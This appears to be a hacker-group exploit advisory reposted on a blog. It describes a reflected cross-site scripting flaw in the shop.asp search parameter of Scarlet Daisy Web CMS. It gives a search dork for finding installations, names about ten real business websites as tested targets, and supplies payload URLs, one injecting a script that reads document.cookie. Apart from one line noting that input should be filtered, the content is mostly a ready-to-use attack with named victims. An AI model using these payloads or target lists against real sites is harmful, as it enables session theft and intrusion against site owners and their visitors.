~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz: DaiMon, PRoMaX, _UnDeRTaKeR_ , BackDoor
Septemb0x , BARCOD3 , ZoRLu, ( milw00rm.com )
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~App. : Scarlet Daisy Web Web Content Management System.
|~Software: http://www.scarletdaisy.com
|~Vulnerability Style : Cross Site Scripting
|[~]Date : "09.12.2014"
|[~]Tested on : Kali Linux
|[Keywords/DORK]: "Powered by Scarlet Daisy Web Content Management System."
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Tested on
http://www.scarletdaisy.com
http://www.crossstitchworkshop.co.uk
http://www.camelotcandlesupplies.co.uk
http://www.claymorehomes.co.uk
http://www.papiransky.co.uk
http://www.sfp-ifa.co.uk
http://www.hattongarage.co.uk
http://www.j-a-c-k.org
http://ahnaylortextiles.co.uk
http://www.ladymire.co.uk
..
..
==============[INFO]======================================
shop.asp 'search' parameter is not safe.
harmful character, they should be filtered.
==============[Exploitation]==============================
HTTP://[VICTIM]/shop.asp?action=form&search=
POST: [Cross Site Scripting]
HTTP://[VICTIM]/shop.asp?search=
POST: [Cross Site Scripting]
HTTP://[VICTIM]/shop.asp?action=form&search=<b>HI WORLD</b>"><script>alert(document.cookie)</script>
Vulnerability Researching, Shellcode, PoC, Exploits, Zeroday, h4 SEC
9 Aralık 2014 Salı
Scarlet Daisy Web CMS <= Reflected XSS Vulnerability
Kaydol:
Kayıt Yorumları (Atom)
Hiç yorum yok:
Yorum Gönder